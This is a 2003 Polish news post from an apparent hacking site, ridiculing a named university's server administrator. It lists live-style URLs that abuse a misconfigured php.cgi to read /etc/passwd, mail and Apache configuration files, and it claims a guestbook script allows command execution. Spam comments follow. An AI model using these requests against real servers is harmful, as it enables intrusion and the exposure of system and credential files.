Pora dokształcić administratorów

Author: hoaxer \ grudzień 13, 2003 \ Aktualności \ 0 komenarzy

Polskie uczelnie nie od dziś były narażone na ataki hackerów, zarówno ze strony niezadowolonych studentów jak i zaawansowanych programistów chętnie penetrujących serwery uczelniane. Jednak administrator serwerów z Uniwersytetu Śląskiego przechodzi samego siebie.

Po kilku lekcjach ze strony polskich hackerów dalej nic się nie zmieniło:

http://www.us.edu.pl/cgi-bin/php.cgi

http://www.us.edu.pl/cgi-bin/guestbook.cgi
Dla niewtajemniczonych tak skonfigurowany php.cgi daje możlowość przeglądania plików na serwerze:

http://www.us.edu.pl/cgi-bin/php.cgi?/etc/passwd

http://www.us.edu.pl/cgi-bin/php.cgi?/etc/postfix/main.cf

http://www.us.edu.pl/cgi-bin/php.cgi?/usr/local/apache/conf/httpd.conf
Guestbook.cgi podatny jest na możliwość wykonania dowolnego polecania na serwerze z uprawnieniami serwera WWW. Łącząć te dwie rzeczy oraz posiadając informacje że system SunOS posiada sporą ilość dziur mamy duże pole do popisu.

Nasuwa się tylko jedno pytanie… Czy aby administratorzy takich uczelnianych serwerów niepowinni zacząć pobierać lekcje u studentów?

Podziękowania dla joeman’a za podesłanie informacji.

Wojciech Grzegorz Mysiakmarzec 17, 2021"https://www.youtube.com/results?search_query=hackers+winnings+digital+pa…"
Filip M.październik 9, 2020"My też zdecydowaliśmy się na voip od firmy Super VoIP i była to najlepsz…"
scot mackpaździernik 1, 2020"Dzień dobry panie / pani, Oferujemy wszystkie rodzaje pożyczek z niskim…"
scot mackpaździernik 1, 2020"Dzień dobry panie / pani, Oferujemy wszystkie rodzaje pożyczek z niskim…"
Arkadiusz Siczeklipiec 1, 2020"Nie wiem czy w dobie ekshibicjonizmu internetowego możemy w ogóle mówić…"